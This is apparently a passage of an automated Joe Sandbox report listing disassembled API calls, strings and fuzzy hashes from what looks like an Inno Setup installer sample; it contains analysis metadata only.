• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CloseCreateFormatMessageQueryValue
• String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2481121983-1280779767
• Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
• Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
• Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
• Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
APIs
  • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
  • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
• CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
• SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
• DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
• String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
• API String ID: 1549857992-2312673372
• Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
• Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
• Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
• Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
• API String ID: 4190037839-2312295185
• Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
• Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
• Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
• Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
APIs
• GetActiveWindow.USER32 ref: 004629FC
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
• GetWindowRect.USER32(?,00000000), ref: 00462A76
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
• Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
• Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
• Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
APIs
• GetActiveWindow.USER32 ref: 0042F194
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
• GetWindowRect.USER32(?,00000000), ref: 0042F20E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
• Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
• Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
• Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02113858,00000000), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D55
• GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,00458D90,?,00000000), ref: 00458D5C
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
• Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
• Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
• Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
• Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                    • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                    • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                    • API String ID: 1914119943-2711329623
                                                                                                    • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                    • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                    • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                    • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                    APIs
                                                                                                    • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                    • SaveDC.GDI32(?), ref: 00416E27
                                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                    • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                    • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                    • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 375863564-0
                                                                                                    • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                    • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                    • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                    • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694776339-0
                                                                                                    • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                    • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                    • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                    • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                    • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                                    • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                                    • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                                    • SendNotifyMessageA.USER32(000103F2,00000496,00002710,00000000), ref: 00481A97
                                                                                                    Strings
                                                                                                    • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                                    • DeinitializeSetup, xrefs: 0048190D
                                                                                                    • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                                    • Restarting Windows., xrefs: 00481A72
                                                                                                    • Deinitializing Setup., xrefs: 00481872
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary$MessageNotifySend
                                                                                                    • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                    • API String ID: 3817813901-1884538726
                                                                                                    • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                    • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                    • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                    • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                    • GetActiveWindow.USER32 ref: 0046172B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                    • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                    • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                    • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                    • String ID: A
                                                                                                    • API String ID: 2684663990-3554254475
                                                                                                    • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                    • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                    • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                    • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                      • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                      • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                    • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                    • API String ID: 884541143-1710247218
                                                                                                    • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                    • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                    • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                    • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
